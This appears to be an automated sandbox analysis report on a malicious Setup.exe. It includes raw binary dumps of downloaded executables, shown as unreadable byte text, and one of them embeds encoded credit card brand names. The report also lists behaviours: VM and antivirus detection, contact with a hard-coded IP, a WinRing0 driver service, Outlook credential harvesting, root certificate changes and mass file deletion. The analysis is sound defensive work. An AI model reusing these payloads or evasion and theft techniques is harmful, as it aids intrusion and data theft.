InternetReadFile Oct. 11, 2023, 6:04 p.m.	buffer: MZÿÿ¸@(º´ Í!¸LÍ!This program cannot be run in DOS mode. $þ#ÓºB½VºB½VºB½VÞLV·B½VÞNVB½VÞOVB½V$âzV¾B½Vè¾W³B½Vè¸W;B½Vè¹WB½V³:>V»B½V+¹W¨B½V³:.V¯B½VºB¼VÓC½V"+¹W@½V+´WPB½V+¾W¹B½V+BV»B½VºBV»B½V+¿W»B½VRichºB½VPEd«#eð" _w_@@w`Ü1wÔ0wÜ°s¤ü°4w0)w()wUPX0_àUPX1 _@à.rsrc0w @À3.96UPX! $ Ä\n8ý`ùv `LI!}<$"ÔRB,OvÆþ=±ÆúÖ:Þ?ºïãâÐ¨]IF5vÞÑq'¯©¢µÍAìI<8Â÷£ÙsÀ~Vç:BÑS4©ñä=§Æ!~<éRh(aQæX;+ß¤Aò¥lg´o¯Ë: x0T%ñh®ê ª=Sü¨é@PSàã-e=7¯ùvSñJ\|?Ê¯¥ÞÈY×ÅVqîÏÈhËKÊáõf[YAª¤«´°è×ÓÅNÞ¾Ç¹Å-§ ë¡ñ¿Óö>äÄ\ÏÉ¾«Jð)dj¦¸ß[óÁÛ'ænµ«¼íª8 ðYïwÈ¡×íÏÈn³Ç±£N´²èë1Qø¤6{$¦6ýSÝÇñüõ_@¾pÒèÃ&]bÂÏÈ¨[7Þ]`ûVÎ3d®l¢B£Êy7´fä/æl%Rdz ýÇmGùÛ.»CÉµÆ¥\|kÅ'Øn§«{Ñ(ÖÅø6ÓRU1÷FüïN¥ê)ñ°yØp[3¶u]ô3G¼wP[/°üÿ'Ohü6$nnÿ¯+\À7ü<ÐãÑÄÈtÒPÿðåvC¿·bºµ5áû§zÒÌlKÕSq±^£U`L7«×Ýu"UÕ-±³Kt¨H\fÊ1 Ý¡Ã©}`¥öVa×ãgNWeßMÇRàÛkm>Ï,iÑPAÅ!ñòK7n8:íE¯`zî>¦4ÁB¬>ÁªÌý§ Ø4É{ò?ñìEÝÈ áëäì5'×MãlÅÎØó¸RÈP@IMõmøLþ#YëOµCC¸&¡íÚ¢Õ4fJ¢FÿW,bÇáEÑ(7v¡.>gld?#5òMæ·mV®Ðq2´úfX¢·³Óþ~¿üï49«iºh¾rÚ¹U³½ÝQjÔ"¬_Õý]èCã:nëÔH£ly®&ÏOW¤.ÂVþð}+ÙQJ:dnCÇ&¶²ä¶úµ. ÷èäøÞ±gíÔÖeùOÒé®n8Æ¾ÞnÔÝÎA8æ)×7ç¾"ÃÀî¾Er»ZT2ä%£ÔÔ4è<;iîJD0Oþ«ÂüV¹"9ù#KükS#mÀ)v¾ÏI}]Å#ÚOJ?Þ# 0;/>2Á U$ß·H~X¾´¬j9[:,ûÒë5§{ù/Ã]vGÊã>\|îî^]ßÏ}²ÝîÕ«÷ý«éáõã4O.«Þ7^ôÿ\:UÿÉ«õÒ{°sE£úÖK4]x^ ^fm[XÖÌ2wcqøsaÂ³FünËH]L´ÝK¯¢×ï. HTÐýOxÐ¿ÑfØl-ÄNb×ÆýðûÞÐ°%sýÿQøÝ¬0Î~±3ôLðw£ËxR(ílö< Y±Vg'@ª7Â_xìÐYD×Ío\CKµÿSEØAáO"ÎLT<üXÄÒß²Ýà kn Ù(Ü³ ôÑã<ï#Wõcû¨É-§îWvèu¶³bUÒ®þÑÏ¬6Æ¥[$µt_jXwµðùÕãr¡½ªÛYeÒV6°å)¢ÎiÇ2×Ô´ ·Ó·ñÁú"ØVWð®)<Âc°ùr¶úñËÆãßYRUÞ=ªÅWÕ\ ëh×zñOGQ(º[lÊv ÏNÍYô_úhÈZ:©ôRý6=ßâg°~}Q¬h8®ç}ýÈRc®ÏÎ`mÂ~5qáÐîª³QJ±çÉMy ùä}\|nÏÅ6×©Léû®È¸íÉ0 JëéÝÚÊUÛÅt6?W,;wµ¦2ÊÆ½~àè¬% 7ýé×éÏ>/Xx idX}"ENþ= JOô{ÝõY§÷I¹òºÞé·ieÓèMR=)«w³}DÏîKÓ¥ëÒ¿bi.qv =AíËßi{mÎHçuoÃÓùµLq%ôà}0+B+5Ì!9ÒkÏ»¿ÝÞ@8Kâùµá¥¥üpXZÓÚ¹4xY}èüôjÐX5$WbU Å'ú/4N_8ù¥³hÃU¯.B½AhRrúüªE; ºfNîv@±ØT¿Öõ¢0Ïµ² °ìIáGkE~%¿Ü^\÷·ë!2áÍ]OS}¤@Eí¯&Þ9ñ&nD\|OYoÕ,?à=.Bä T?F¡W8J%&Ëé¿Ù=Þè´}KrÈ×¡ÇH3õ¹HÍaîhS}ìtM0 §§;\ÕÊo?ò(X¼AwXIJ%''KsMü¼-R ¢Qí»½&à Jïn>»A¯«Ó\éðÖ))Ê/%d((©ÛâÉÚ1sÅúÖg ïâ¯ÐæèÐö÷$!¡½ýKFLpèÊ£ëø¾;[Ì.èë8Kd$óñ¨k- nÅl!¡7än¦úó¤ÂCx{ºeÃÞþHü=ã4Ñ¹þÁ×Ãb¸ïúÐ!<¬# èÁë aÓv¬'UbH~!zã ×&³[eeè:cÖ£0&½øLÅl1½ØkWb'ÄBMuÐVÓÄÆúLFªNBâ´¯m3ZäOýr\|LÝ'¨-;UQ!½WÀämsQ<ÉÍYFÈºæzhW¦ÃOÁÏO?þEoÃßEJåAa¿ày©Ãr]!e²Á¯±Ãà\Eu^Aù_ÊÈøÙöY·éÂ ¶Z@¶i3¡@\|& ÿ\|}Ún¿C·rudFØIÚLë cøã«H¬Ø³³KÔ M`àÚr%)»·\|?ôW»9Êk'gÍVèHCGxø1$oeêÏZ·2"éòÚ%iTâÛx¨ew¹íñ$L²Yh§9L=@-³§ýöÍÑ%qÌx$ÄÑzY§#Ü!g§\ûÑ\ÔÏ,:×»^º%®¿ðBÔÉ6ÓXØÞ/Þ¨÷ò ¥Å ÝÏÆ÷ïKi¨i½SèÌóa. fqõQÑ'mÇæ§¤æîO)ÊyÝc-¢L24' T¿WUw ,ux]§d%rFA¿=À\¨ýpfÊ£½ôAáyÁ0Ø÷À9¯³øgoÀiÌ#ËÑûåÍÛ¶øãÞúEg×ãEûoOo¤ÊÀå¿¼»(µèfc·±©¾aTjëî¿¡ñaPÉdTÊgûØ<ÆcVÃ-m´F$}®h-7ÅÓzcE@6,Í¦Fç¬:<JZêÞHæCWRÌÉëmâØ.©ü¹Õ} Ö]-ÜbÝiC5Ò-ïvçÛ}%^þH§^Ú[7ós p¤/ÃÂ2CSðí·Õr4ÙV&ÚW¨\|×x,ìGØz¹`·îhª?bÂFÁÕáu±¦Í53ÝL`Îh\|O%ñiüK®~"@±·3ûA ¹§Q (4ûj!ßE·8zÛ 9)ÐZ±öEÔ>í-¬þeÄqÊ ÁâhsÅa:jmiN/fÏÐü·ë!3ÕûãâÔ1PW~¨iÉªV÷:3ú²pxÉr ýÑö3ãY§dçäføðÚóã{M request_handle: 0x00cc0018	1	1
InternetReadFile Oct. 11, 2023, 6:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL,zµà"0F3e3 3@ À3`@e3K3 3 H.textE3 F3 `.rsrc3H3@@.reloc 3N3@Bpe3HL¿ô¥ôöVÈRGluZXJzIENsdWIgQ2FyZA==VmlzYSBNYXN0ZXIgQ2FyZA==Q2FydGUgQmxhbmNoZSBDYXJkRGlzY292ZXIgQ2FyZA==TWFlc3RybyBDYXJkVW5pb24gUGF5IENhcmQ=S29yZWFuTG9jYWxDYXJkRXhwcmVzcyBDYXJkTGFzZXIgQ2FyZA==SkNCIENhcmQ=SW5zdGEgUGF5bWVudCBDYXJkQkNHbG9iYWw=TWFzdGVyY2FyZA==VmlzYSBDYXJkQW1leCBDYXJkU29sbyBDYXJkU3dpdGNoIENhcmQ=(n* *.rp( Jrp(o "þs`>þsh%}"* sX2o sT2o sNN($ (& o "o$i&lo%"o$k-rp(+ r]p(o :( o uus°J(=-o*s¾j(=-o$#"ls¾Z(=-o("J(=-o&r~, ( s°ls¾N(=-o,jsÌJ(=-o*"(+ .(=þþ(- ^~- s" ~(A N {þn}\|þ}n}}\|þ²{3\|(F {3\|(G 6sH(N6sI(N"}2\|(Kq6sH(T6sI(T"}2\|(Kq¶(A }{(>,{o }2\|(JF\|(J2\|(KR}\|þ2{sX{(>,{o }f(A }(I }{sJ z(ff(A }(I }!n}{#,{#o rý}{$,{$o { (p{&"}& F{%oK sH2{%oL 2sâ{%oM ö(=,(Ò2{%oL 2 {%oN {%oO sâv(=,(Ò{%oN 2{%oL ¶2{%oL 2{%oM {%oP >{%oQ &>þs%}*JsV }%(Ef(A }'(I })f}'\|+þo {(({-"}- F{,oW sI{,oX , {,oY sãê(=,(Ò{,oX ,{,oZ {,o[ 2{,o\ ª{,oX -{,oY {,o_ &6{,oX >þs¢%}2Jsd },(EN(+ {.(=f(A }/(I }1f}/\|3þo {0(©* {4"}4:(E}42{4s°"o5 {4(Bo3 "o5 &2{4o- * F\|5($ (& {5"}5"{5j&l}5:(E}5:(Eo 2{5s¾:oo3 &2\|5(f * 2\|6(g {6"}6:(E}62{6sÌ{6-rp(+ r]p(o3 &z-u?,{6¥?þ*2\|6(h N~8,~7sÓ(E* .rap((ÒB3uþJrap(o3 &FsÓ78* V(E}9}:V(E}9}:î{:-{9o+{9{:o}9Js(+o"sãNs(+oJs(+o-þ.(ëþ^#s¾(+&>ls¾(+&n#s¾(+&"~#s¾(+&#:s¾(+&Þ~,rËp(s°(+&+#s¾(+&jª~,(* s°(+&ls¾(+&>sÌ(+&:sÌ(+&2s(+2s(+(D~r¼9p(sn (o o -( r.jp(( ;g<~[o9&~W(0&~X(0&B~Yo5jþN]^(H2{a(Gr@%( ¢(Ó %(Ô {c"}c{d"}d{e"}e{f"}f{g"}g{h"}h{i"}i{j"}j{k"}k{l"}l{m{n{o"}o&(i{p{q"}q{r"}r{sæ(i2(+(ui2(+(u request_handle: 0x00cc0018	1	1
InternetReadFile Oct. 11, 2023, 6:04 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELËÊK¸à"0N= @@ @ø<S@¶` H.textT `.rsrc¶@ @@.reloc`&@B0=Hø!( 0 þ þ þ þþ þþþ9, þ( þ ( o ( þ8Pþþþ9þ Xþ þ8 þ ( þ þ þþ: þ8 þþ984ÿÿÿ( þo þÝ&rpþÝþä0Crp(( rEp(( +( Þ&ÞXi2çÞ&Þ*(0??BSJBv4.0.30319l@#~¬ #StringsL`#US¬#GUID¼D#BlobG ú%3ts6nÂä6Q6V(ÉÇÉ¨É8ÉÉÉ?ÉòÉZoÂÂèÂuÂPÛPæP0AZÁ X !SP þ þ þ!þ )þK9þZAþZIþZQþZYþZaþZiþZqþyþZþZþZº¡§#¸)®±Ï¹e6Éë?þ '.#.,.#Q.+_.3p.;p.Cp.K_.Sv.[p.cp.k.s½.{Ê/ò¥NXEDKR0T2LN2LT79IM5Q8IBZ3LOQQN2V114AJLTPIN69QWJ8GUB4102EVPK8CJCPT1BUY6073QIULCIGBQJ5L74A80O3AUN9KRQZVZKK4DBKSH3TGE6V9HDV7AV7R67ICIK3WTVMG9AH6TS075X6X19DN41VDM38G2IK797XSUP9G6ZNR4AVJAVKIHQ119I3GCADLI3779NDMA6RFODILHZFH7BZSG6TLV3D5VCJBCXJXR8IK9VN69S8M46NGDO1C410G3VUM4HITPSZ92PTUTXMD51AYYC7Y6G20HCRNBAB1JP6MHONY5HTGOWLBU5X1KUXJZ8107GSSVU4Q4YRKYI2YXVLV1P2FNKRY1XWIWX1YYBV425H6OMCC19WEWG9SNNEKDFYGCIXBRD9VAR26I60AIP62BRVQYJLL6L0WGA3FYAVX9AEENDJQWECYI6FUXHNH2YZZ1FZHDULH4J2BNQCV95Y2ICOK5ISRXN5KLONINCMB2549DEGGF2I6A6QY1OM4C4TQNRZ8D4H6SW9NIOH1CML5E8KO8ZQ80S98LNWVOHDLULON7CQNHU2ZSXMOHLAONJGAWBC42WM4JAL2U7Q6ID1FZJPXBHOCHY7LFO06AVUVH8QSMT4J4EFJRAKNVO3VIKWUC9XGGU5WTG7137LRMEIDTX3EDNLW29M7L5PM6YCKIS0LDSTXDMIEBTBOGSC3JJ4T39P7S8UYB75A7RBU3XSP1I624AGOVJB8YHSDCVFE1TCDXARYQR9V0O1UDXDR1GC266MZ98SHSNYHG2E3TR7EJPHJP89PSXNVRKH1Y1ZS91DN0UOLTJ8KI8SRYCKB8CZ4AC05VNF1KWC0J2IDLT14JDLZTZJP7KRC6HEXP784ZLY1TLTMS6R0A5I28JEJJ43AEA4CXUYOV6E8OTFIG67B31CB9LZF2YV4SXXTQRZ7HCFD0KOPD6DM72HN73DM5SW6LKP16W1YHA30V9KY7KC5UI7ZQJVXNNBZPJ1Q4WSRFOE79Q27SOOVQ0MCNZKWADL48EKMI44K1U0GD909RYF98QJZ7YCEL6QBDK85FPZYUE359F9N8LEM8L5R4VPT1Z85DZC3A53B8QP4XNZ1ZZFA1EC1ORAUAG74F81KDFMDSCOS6B4R6Y4BT8D9WKOT5JB1TUZYWOXTMCRZ0U5NXTXMM5LG52Y213HJBW9LMF4RAKZQQOIBPB6MVYPXJS34042T4IXEVTARYGLBG40RTXNZ65YMGLC4LA1GSFVI0EP6AOXOMORP1MKDRCW9UL7KRGGYPFTAIR1PHRYSHJA24XC9ZYYPTWYOGFO3I99G5QGJV559ND1KLFP4EH80RDQW3MIBC5KIK36NQ2N32ZBP4NDB0UZBAIZ19UQJX47S3TARICNL3E81BB1PJHLRFJHBDFN5MEG82TWLNV2YGNH5J7083AAPSPNUL8ODYS9Z8A9SPQBXOXK2BM1FOPBLE1PMFB9PHY9YNS7J8HTN8MA4EVS9GIYJQXVGUWMNQWQZXWOTOSHH5YN10VIUTAI8A0HZ60YM5F6L5KGSG8UYBRN2K3Q9O13QORZ7OYWX34L02B5POZOVPT7SNPODKZ8DMQ7NVJDSL65GFW9J7BVYNIA4UHT9JTND6INLDS4EW5JSY0M0PFGIEKZDQC2N0EI2S1K7JYFPHQBR8RG452TENF9WTJ5ZQOSXR96PPR1A0BYIHF868S7UEPN2YN93E00BT4RRJPPL2DWDLOLE6E07R8SCVE1BS75ALWYNYRWSCW1A2KRKB47992UVLO5FXN25IV2YZ8QPRH45HSJLWRAXA5BSCDBJVQ5Z362HS3UCOSR17YO3EUSGNF4MUKVV7H3BMFBK0C3367JSNJUNZIEB8YLXBPWIH9FGYQO2XDDC1ZKQ5M8LZH5ZC2CY4NJKQUV71C36420WFCKIO42ZQLSADQE6N07J32WGDMZ3SBQ7QJTAR3KAVT4ECV4K87TD4R2MPDFBE9HO4UT36DOTQ7XK8RDRSO4USMD9QHUOYI5WMPKRCAO4S9X73SO89YSZEW5RRUMZTA5HBB7SHWPSAACTZFF82VOAZFSZT2ASXYLSDP62U60NIAZEUL2LOO67O2TENGA7VNQGWQSI5SS296UWB4ZU38WZCZ67B5T7OLXG2C11DHOHS6PSH7DTQQEW00D7UVGA9VNXJO48C8QWTPHGKN0E29Q8HAPB94GSAOI7S1J2CEQS9RDLS6WG4CI9EPQJ929I18VFGKXTE7BXT88Z6DTCHAX8GJ2DK93KFH0B58FIJDC7AUQFQ1M6J6A1LX87RTIED1SLI7387K3E8Z7V2XXSX7AIH80I9H0Z473ICF6S8N88D63V0ME460RG0JDKHV80UDKA6YTX0EUJ9CFLFER request_handle: 0x00cc0018	1	1

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (1 event)

host

185.225.75.8

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle Oct. 11, 2023, 6:03 p.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle Oct. 11, 2023, 6:03 p.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW Oct. 11, 2023, 5:57 p.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\ProgramData\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\ProgramData\WinRing0x64.sys desired_access: 983551 service_handle: 0x00000000212e0140 error_control: 1 service_type: 1 service_manager_handle: 0x00000000212e0110	1	556663104	0

Harvests credentials from local email clients (1 event)

file	C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	Setup.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process	Setup.exe				useragent	curl/1.0

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 124 events)

file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Users\test22\AppData\Local\Temp\ArmUI.ini
file	C:\Users\test22\AppData\Local\Temp\java_install_reg.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20210707200853994).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log
file	C:\Users\test22\AppData\Local\Temp\dd_dotnet4.5_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\AdobeARM.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000028.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log
file	C:\Users\test22\AppData\Local\Temp\01.ps1
file	C:\Users\test22\AppData\Local\Temp\jawshtml.html
file	C:\Users\test22\AppData\Local\Temp\~DFB8537D6963ECB123.TMP
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000025.log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000013.log
file	C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt
file	C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00001.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log
file	C:\Users\test22\AppData\Local\Temp\RGI1518.tmp-tmp
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\SETUP.CHM
file	C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000017.log
file	C:\Users\test22\AppData\Local\Temp\chrome_installer.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 KOR Language Pack Setup_20200715_141443571.html
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000020.log
file	C:\Users\test22\AppData\Local\Temp\RGIC87.tmp-tmp
file	C:\Users\test22\AppData\Local\Temp\java_install.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000007.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Temp\bchC68D.tmp
file	C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 Setup_20200715_141303844.html
file	C:\Users\test22\AppData\Local\Temp\PrinterSetup.log
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\BRANDING.XML
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00002.log
file	C:\Users\test22\AppData\Local\Temp\dd_TMPA86C.tmp_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\CVR8B49.tmp.cvr
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\BRANDING.XML
file	C:\Users\test22\AppData\Local\Temp\RD25B7.tmp
file	C:\Users\test22\AppData\Local\Temp\outlook logging\firstrun.log
file	C:\Users\test22\AppData\Local\Temp\7zO8F39374F\test.docx
file	C:\Users\test22\AppData\Local\Temp\Outlook 로깅\test2gmailcom-Incoming-04_05_2018-14_18_32_876.log
file	C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file	C:\Users\test22\AppData\Local\Temp\SetupExe(202107071812439D0).log

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Oct. 11, 2023, 5:57 p.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Trojan.Heur.JP.yCW@aKAYGQfi
FireEye	Generic.mg.aac23ff6c2cc9376
Skyhigh	BehavesLike.Win32.AdwareImali.fh
ALYac	Gen:Trojan.Heur.JP.yCW@aKAYGQfi
CrowdStrike	win/malicious_confidence_70% (W)
Arcabit	Trojan.Heur.JP.EEFFD9
BitDefenderTheta	AI:Packer.1B7EED641F
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	not-a-virus:HEUR:AdWare.Win32.Generic
BitDefender	Gen:Trojan.Heur.JP.yCW@aKAYGQfi
Avast	Win32:Dh-A [Heur]
Emsisoft	Gen:Trojan.Heur.JP.yCW@aKAYGQfi (B)
VIPRE	Gen:Trojan.Heur.JP.yCW@aKAYGQfi
SentinelOne	Static AI - Suspicious PE
MAX	malware (ai score=88)
Microsoft	Program:Win32/Wacapew.C!ml
ZoneAlarm	not-a-virus:HEUR:AdWare.Win32.Generic
GData	Gen:Trojan.Heur.JP.yCW@aKAYGQfi
VBA32	suspected of Trojan.Downloader.gen
Cylance	unsafe
Rising	Trojan.Generic@AI.100 (RDML:ta5QK8JxBhTR1KA33molAg)
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:Dh-A [Heur]
Cybereason	malicious.929936
DeepInstinct	MALICIOUS

Setup.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All